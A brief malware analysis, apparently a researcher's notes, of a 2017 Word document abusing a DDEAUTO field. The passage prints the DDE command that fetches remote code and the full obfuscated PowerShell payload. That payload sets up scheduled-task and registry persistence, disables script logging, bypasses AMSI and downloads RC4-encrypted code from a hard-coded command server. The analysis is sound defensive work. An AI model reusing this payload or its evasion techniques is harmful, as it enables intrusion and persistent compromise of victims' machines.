Office DDE With Rad Powershell Obfuscation
$ vti 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:47 INFO Starting VirusTotal Intelligence downloader
2017-10-16 19:51:47 INFO * VirusTotal Intelligence search: 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:47 INFO * Number of files to download: 100
2017-10-16 19:51:47 INFO Creating folder to store the requested files
2017-10-16 19:51:47 INFO Retrieving page of file hashes to download
2017-10-16 19:51:47 INFO Retrieved 1 matching files in current page, queueing them
2017-10-16 19:51:47 INFO No more matching files
2017-10-16 19:51:47 INFO Waiting for queued downloads to finish
2017-10-16 19:51:47 INFO Downloading file 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
2017-10-16 19:51:48 INFO 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967 download was successful
file 55e
2017-10-16 19:51:54 INFO The downloaded files have been saved in ./
$ file 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967
55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967: Microsoft Word 2007+
$ 7z e -so 55e2699721379352b0be2ea6b1c71257342d07efbe78c84d7257497f8f75e967 word/document.xml | sed 's/<[^>]*>//g'
Press OfficeEcumenical PatriarchateEPpress@patriarchate.org212. 774.0332To the Clergy and Staff of the Ecumenical PatriarchateOctober 16, 2017ISTANBUL DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell.exe $x = (New-Object Net.Webclient).downloadstring('http://citycarpark.my/components/com_admintools/mscorier'); cmd.exe /b /c $x"!Unexpected End of Formula
Hmmmm. Looks like a legit domain is hosting malware.
The payload...
--2017-10-16 19:52:46-- http://citycarpark.my/components/com_admintools/mscorier
Resolving citycarpark.my... 103.6.198.162
Connecting to citycarpark.my|103.6.198.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6120 (6.0K)
Saving to: ‘mscorier’
mscorier 100%[===========================================================================================>] 5.98K --.-KB/s in 0s
2017-10-16 19:52:47 (127 MB/s) - ‘mscorier’ saved [6120/6120]
$ file mscorier; cat mscorier
mscorier: ASCII text, with very long lines, with no line terminators
SEt ncXA= $nBW = [TYPE]("{0}{1}" -f 'R','Ef') ;
$DMvO= [typE]("{0}{3}{6}{5}{7}{2}{8}{4}{1}" -F 'SysTEM.nET.SeRV','er','IN','I','AG','ep','C','o','Tman') ;
sET ('c'+'guo') ( [tyPe]("{0}{4}{1}{5}{3}{2}"-F 'sYsTE','t','quESt','WeBre','M.ne','.') ) ;
SeT kd7I ( [tYpe]("{0}{7}{4}{2}{6}{5}{1}{3}" -f'S','ia','Net.crede','lcAChE','.','T','N','YStEm')) ;
SeT-Item ('VaRi'+'ab'+'lE:1'+'e9'+'zq0') ([Type]("{1}{2}{4}{3}{0}{5}"-F'D','sysT','e','t.ENCo','M.tex','iNg')) ;
${regp`AtH} = ((("{10}{8}{14}{12}{15}{0}{3}{7}{4}{6}{5}{16}{9}{2}{1}{13}{11}{17}"-f'Vf','rs','e','Win','fCurr','hemes','entVersionIVfT','dowsIV','U:IVfSoft','V','HKC','o','r','i','wareIVfMic','osoftI','IVfTheme','n'))."rEPlA`cE"(([cHAR]73+[cHAR]86+[cHAR]102),[STriNg][cHAR]92));
${P`A`RTs} = ${Regp`A`TH}.("{0}{1}"-f'spl','it').Invoke('\');
${p`AtH} = ${r`e`gpaTH}.("{1}{0}"-f 'it','spl').Invoke("\\")[0..(${p`A`RTS}."co`uNt" -2)] -join '\';
${pa`YlO`AD} = (.("{0}{2}{1}"-f'New-','t','Objec') ("{2}{0}{1}" -f 'et.Webclien','t','N')).("{3}{4}{1}{2}{0}" -f'g','load','strin','d','own').Invoke(("{1}{0}{5}{2}{3}{4}{6}" -f'w','http://185.128.42.194/','rin','tprox','y','sdp','';;
));
${NA`mE} = ${P`A`RTs}[-1];
${N`Ull}=^&("{2}{4}{1}{0}{3}" -f 'pert','ro','Set-It','y','emP') -Force -Path ${pA`TH} -Name ${n`AMe} -Value ${Pa`YLO`Ad};
.("{1}{0}" -f'asks','scht') ("{1}{0}" -f 'reate','/C') ('/F') ("{0}{1}" -f'/S','C') ("{1}{0}"-f 'Y','DAIL') ("{0}{1}" -f'/S','T') ("{1}{0}" -f '00','11:') ("{1}{0}"-f 'TN','/') ("{1}{4}{2}{0}{3}"-f 'teServiceI','F','da','nit','lashUp') ("{1}{0}" -f 'R','/T') ((('C:aWXWi'+'nd'+'ows'+'aWXS'+'yste'+'m32'+'aWXWind'+'ow'+'sPo'+'w'+'erShel'+'la'+'WXv1'+'.'+'0'+'aWXpowe'+'rs'+'h'+'ell.'+'e'+'xe ') -rEPLAcE([char]97+[char]87+[char]88),[char]92)+'-c'+' '+('gfON9IKFe'+'x=K'+'F'+'e((g'+'p ')."Re`pL`ACe"('gfO',[sTRING][CHar]92)."R`EP`lAce"(([CHar]75+[CHar]70+[CHar]101),[sTRING][CHar]36)."rE`pLACe"('N9I',[sTRING][CHar]34)+(('HK'+'CU:KmpSoftwar'+'eKmpMi'+'cro'+'soft'+'KmpW'+'indow'+'s'+'KmpCur'+'rentVersionKmpT'+'heme'+'s ')-cREplACE([ChAR]75+[ChAR]109+[ChAR]112),[ChAR]92)+'ThemeVersio'+'n'+').The'+'meV'+'ersion);
cm'+'d'+'.ex'+'e '+'/'+'b '+'/c'+' '+('{'+'1}x{0}{'+'2'+'}')-f[ChAR]92,[ChAR]36,[ChAR]34);
^&("{2}{0}{1}" -f 'as','ks','scht') ("{0}{1}"-f '/C','reate') ('/F') ("{0}{1}"-f '/S','C') ("{1}{0}"-f 'Y','DAIL') ("{1}{0}" -f 'ST','/') ("{1}{0}" -f':00','15') ("{0}{1}" -f'/','TN') ("{1}{2}{3}{0}" -f 'e','Flas','hUpdateServ','ic') ("{0}{1}"-f '/T','R') ((('C'+':a'+'b1Windo'+'ws'+'ab1'+'Sy'+'s'+'te'+'m32ab1W'+'i'+'ndowsPowerShella'+'b1'+'v1.0ab1'+'po'+'we'+'r'+'shell'+'.'+'exe ') -REpLaCE'ab1',[ChAR]92)+'-'+'c '+('tqnd6sS'+'2'+'Mx=S2M('+'(gp ')."REPl`ACE"('d6s',[STrInG][chAr]34).("{0}{1}"-f'Re','plAce').Invoke('S2M',')."RePL`A`ce"(([chAr]116+[chAr]113+[chAr]110),[STrInG][chAr]92)+('H'+'K'+'CU:'+'z0x'+'So'+'ftware'+'z'+'0'+'xMicroso'+'f'+'tz0xW'+'indowsz0xCurren'+'tVer'+'sionz0'+'x'+'Th'+'emes ')."rE`plACe"(([ChaR]122+[ChaR]48+[ChaR]120),[sTrinG][ChaR]92)+'Theme'+'V'+'er'+'sion).T'+'h'+'eme'+'V'+'e'+'rsion);
c'+'md.exe '+'/b'+' '+'/c'+' '+(('A'+'Cc'+'x'+'ckgpbH')-REPlacE([cHaR]112+[cHaR]98+[cHaR]72),[cHaR]34-REPlacE'ckg',[cHaR]92 -REPlacE 'ACc',[cHaR]36));
${gR`OUPPoLiCY`SetTI`N`gS} = (ItEM VaRIABle:NBw ).vaLuE."a`Sse`mbly".("{1}{0}"-f'e','GEtTyP').Invoke(("{1}{2}{3}{4}{5}{0}"-f'tion.Utils','Sy','stem','.','Managemen','t.Automa'))."GETFiE`LD"(("{4}{0}{3}{1}{2}" -f'achedGro','cySettin','gs','upPoli','c'), 'N'+("{1}{0}{2}{3}{4}" -f 'nPu','o','blic,Sta','t','ic')).("{1}{0}"-f'EtVAlUe','G').Invoke(${NU`ll});
${GRoUP`p`oLiCySe`T`T`INgs}[("{0}{2}{1}"-f'Sc','ptB','ri')+("{3}{2}{0}{1}"-f'in','g','ckLogg','lo')][("{3}{1}{2}{0}"-f 'B','cri','pt','EnableS')+("{0}{2}{1}"-f 'l','ing','ockLogg')] = 0;
${gROu`pP`OlicYs`Etti`NGS}[("{1}{0}{2}" -f 't','Scrip','B')+("{0}{2}{1}{3}"-f'l','o','ockL','gging')][("{1}{3}{4}{0}{2}{5}"-f'ca','Enabl','tionL','e','ScriptBlockInvo','ogging')] = 0;
(GCi ("VarIAbl"+"e"+":nbw") ).valUE."a`sSE`mbLy".("{2}{0}{1}" -f'T','TYpe','GE').Invoke(("{0}{5}{1}{7}{9}{8}{6}{3}{4}{2}"-f'Sy','an','siUtils','on.A','m','stem.M','omati','a','ut','gement.A'))^|^&('?'){${_}}^|^&('%'){${_}.("{0}{2}{1}"-f'G','tFIeLD','e').Invoke(("{2}{0}{3}{1}"-f'm','nitFailed','a','siI'),("{1}{0}{4}{3}{2}" -f 'l','NonPub','ic',',Stat','ic')).("{0}{1}" -f'SeTV','aLue').Invoke(${n`Ull},${TR`ue})};
$DmVO::"EXPEc`T100c`oNt`Inue"=0;
${Wc}=.("{1}{0}{2}"-f 'bjEC','NEw-O','t') ("{4}{1}{2}{3}{5}{0}"-f 't','m.NeT.','W','ebCliE','SyStE','n');
${u}=(("{1}{4}{14}{18}{15}{12}{16}{10}{3}{17}{13}{8}{7}{9}{6}{11}{2}{5}{0}"-f 'ko','M','ke',';
','ozilla',' Gec','.','v:','r','11','s NT 6.1','0) li','ind','7.0;
','/',' (W','ow','WOW64;
Trident/','5.0'));
( gEt-VarIABle ("d"+"mVO") -vALUEo )::"sERVe`RCE`R`TIF`ic`ATeV`AliDA`T`Ionca`LLBack" = {${tR`ue}};
${WC}."HE`AD`eRS".("{1}{0}" -f'dd','A').Invoke(("{1}{0}{2}" -f 'r-Ag','Use','ent'),${u});
${wc}."p`RoXy"= ( VaRiAbLe ('C'+'GuO') -valuEo )::"DE`FaU`l`Twebp`ROXy";
${WC}."pRo`xY"."cRe`dEn`TiALs" = $Kd7i::"d`efAULTn`ET`Wo`RKc`ReDe`NtiAls";
${k}= $1E9zq0::"As`cII".("{2}{0}{1}"-f 'ETBY','tes','G').Invoke(("{3}{0}{2}{5}{4}{1}"-f '31fe76','147f53229c8e02','90a85','a2','eb','f02'));
${r}={${D},${K}=${AR`Gs};
${s}=0..255;
0..255^|^&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${K}."CO`UNt"])%256;
${S}[${_}],${s}[${j}]=${s}[${j}],${s}[${_}]};
${D}^|.('%'){${i}=(${i}+1)%256;
${h}=(${H}+${S}[${i}])%256;
${s}[${I}],${S}[${h}]=${S}[${H}],${s}[${I}];
${_}-BXor${s}[(${s}[${i}]+${s}[${H}])%256]}};
${Wc}."HEA`deRS".("{0}{1}"-f 'Ad','d').Invoke(("{0}{1}" -f 'Cooki','e'),("{2}{6}{1}{3}{4}{0}{5}" -f'V3v9eyml','on=j4','s','ppw/','hpWdU/l5','AYxmE=','essi'));
${S`eR}=("{4}{5}{2}{3}{6}{0}{7}{1}{8}"-f'94','8','tp','s:/','h','t','/185.128.42.1',':','080');
${t}=("{1}{0}" -f 's.php','/new');
${d`ATA}=${W`c}.("{0}{1}{2}"-f'Do','wNLO','AdDATA').Invoke(${s`eR}+${T});
${Iv}=${D`AtA}[0..3];
${D`Ata}=${dA`Ta}[4..${da`Ta}."l`ENG`TH"];
-joiN[ChaR[]](^& ${R} ${dA`TA} (${iv}+${K}))^|.("{1}{0}"-f'EX','I')&& sET GkOUh=echo iEx ([eNviRonmENt]::GEtEnVIRoNMenTVaRiABLE('NCxA','prOCEss')) ^|PoWErshell -NoexI -noninT -executIoNpoliC BypaSS -WiNd HiDDEN -nOP -&&C:\WINdOwS\sYStem32\cmd.exE /c %GKouh%
SEt NeI= ${1`h7`Vk8} =[tYPe]("{0}{1}"-f're','f') ;
${kj`I82} = [TYpE]("{1}{4}{3}{6}{0}{2}{5}"-F'tMAnaG','SY','e','Et.SeR','stEM.N','r','VICePOIn') ;
${Yk`s4} =[tyPE]("{3}{0}{4}{1}{2}"-F'Y','m.neT.WEB','requESt','S','sTE') ;
.('SV') ("{1}{0}" -f'6','bqXT') ( [Type]("{0}{4}{6}{1}{7}{3}{2}{5}" -f's','NET.','i','t','Y','alcaChE','STem.','creDen') ) ;
.("{0}{1}{2}"-f 'SET-VA','RIA','BLE') ("{0}{1}"-f'KO','5W') ( [TYPE]("{3}{0}{2}{5}{1}{4}"-f 'YSt','E','eM.t','S','NCODIng','EXt.') ) ;
${Grou`pPOL`iCyS`E`Tti`NGs} = ( .("{1}{2}{0}" -f 'ABle','var','i') ('1H7Vk'+'8') )."VAL`Ue"."as`SeMBLy".("{1}{0}{2}"-f 'yp','GeTT','E').Invoke(("{3}{4}{2}{5}{1}{0}"-f'omation.Utils','ment.Aut','m.Mana','Syst','e','ge'))."GeTFIE`lD"(("{3}{1}{6}{5}{0}{4}{2}"-f 'etti','achedGrou','s','c','ng','S','pPolicy'), 'N'+("{0}{2}{4}{1}{3}"-f 'on','c,St','Pub','atic','li')).("{2}{1}{0}"-f 'E','VaLU','Get').Invoke(${n`ULL});
${GRo`U`pPO`LICySettiN`Gs}[("{1}{0}" -f 'criptB','S')+("{2}{1}{0}"-f 'ing','Logg','lock')][("{3}{2}{1}{0}"-f 'riptB','bleSc','a','En')+("{3}{1}{2}{0}" -f 'g','o','ckLoggin','l')] = 0;
${gR`O`UPpOli`CyS`eT`TI`NgS}[("{0}{1}{2}"-f 'Scri','p','tB')+("{3}{2}{1}{0}" -f 'gging','kLo','oc','l')][("{3}{5}{2}{0}{10}{7}{4}{9}{1}{8}{6}"-f'B','io','t','Enab','o','leScrip','ging','v','nLog','cat','lockIn')] = 0;
(^&("{1}{0}{2}" -f'a','GEt-vaRI','blE') ("1"+"h7vK8") )."VaL`UE"."AS`s`Embly".("{1}{0}" -f 'PE','GETTY').Invoke(("{6}{5}{2}{4}{0}{3}{1}" -f'.AmsiU','s','ent.A','til','utomation','.Managem','System'))^|^&('?'){${_}}^|.('%'){${_}.("{1}{0}" -f 'lD','GETFiE').Invoke(("{2}{1}{0}" -f 'ed','tFail','amsiIni'),("{2}{3}{1}{0}{4}"-f ',Sta','nPublic','N','o','tic')).("{1}{0}{2}"-f'tVALu','Se','E').Invoke(${n`Ull},${Tr`UE})};
${kJI`82}::"eXpeCt100c`o`NTIn`Ue"=0;
${wC}=.("{2}{0}{1}" -f 'OBjeC','t','NEw-') ("{4}{5}{0}{3}{2}{1}" -f'B','Nt','lIe','C','SY','Stem.NEt.We');
${U}=(("{9}{13}{0}{17}{19}{16}{18}{8}{6}{7}{15}{3}{14}{11}{10}{4}{12}{1}{2}{5}"-f'.0','G','ec','en',' l','ko','r','i','T','Mozil','11.0)','7.0;
rv:','ike ','la/5','t/','d',' NT 6.1;
',' (Wi',' WOW64;
','ndows'));
( ^&("{0}{1}{2}"-f'cH','ildI','teM') ("{0}{2}{3}{1}" -f 'v',':kji82','Ar','IaBle'))."VA`LuE"::"SEr`VERcERTif`Ica`TE`VaLID`A`TIo`NCa`LlBA`CK" = {${t`RUe}};
${W`C}."HE`AdE`RS".("{0}{1}" -f 'A','dD').Invoke(("{3}{2}{1}{0}" -f't','-Agen','ser','U'),${U});
${WC}."PrO`Xy"= ${yk`s4}::"D`EFa`Ul`Twe`BpRoXY";
${W`c}."pRo`XY"."C`RE`dEnT`IAls" = ${b`qXT6}::"dEFauL`TnEtw`or`KC`R`ED`ENtialS";
${k}= ${K`o5W}::"aSC`II".("{0}{1}{2}"-f 'GE','T','BytEs').Invoke(("{1}{8}{4}{5}{7}{6}{2}{3}{0}"-f 'f53229c8e02','a231','02e','b147','e','769','5f','0a8','f'));
${R}={${D},${k}=${A`Rgs};
${S}=0..255;
0..255^|.('%'){${J}=(${j}+${S}[${_}]+${k}[${_}%${k}."cou`Nt"])%256;
${S}[${_}],${S}[${j}]=${s}[${j}],${s}[${_}]};
${D}^|.('%'){${I}=(${I}+1)%256;
${H}=(${H}+${s}[${I}])%256;
${S}[${I}],${S}[${H}]=${S}[${h}],${S}[${i}];
${_}-BXOR${s}[(${s}[${I}]+${S}[${H}])%256]}};
${W`C}."HEa`ders".("{1}{0}"-f 'dD','A').Invoke(("{0}{1}"-f 'C','ookie'),("{1}{5}{4}{3}{0}{7}{8}{2}{6}" -f '6P4WA','s','PI','I','on=F','essi','vQyr1XM0=','qcTBaDH','RXU'));
${S`er}=("{7}{1}{2}{4}{5}{3}{6}{0}"-f '080','//185','.','42','128','.','.194:8','https:');
${t}=("{2}{0}{1}" -f 's.ph','p','/new');
${d`AtA}=${w`c}.("{3}{0}{2}{1}"-f 'Wnl','tA','oaDDA','DO').Invoke(${S`ER}+${T});
${I`V}=${d`Ata}[0..3];
${dA`Ta}=${D`ATA}[4..${da`Ta}."Le`NGTh"];
-JoIN[ChAR[]](^& ${r} ${Da`Ta} (${iV}+${k}))^|.("{0}{1}"-f'I','EX')&&sEt SZo=ecHo iEX ([enVIronmenT]::GEtenviROnmeNtVARIAbLe('nEI','proCESS')) ^|POwERsheLl -noEXIT -exeCu BYpASs -nopROFiLE -NOniNT -wIndOW 1 - && c:\WinDoWs\SysTem32\CMD.exE /c%szO%
Cookie
session=j4ppw/hpWdU/l5V3v9eymlAYxmE=
session=FI6P4WAqcTBaDHRXUPIvQyr1XM0=
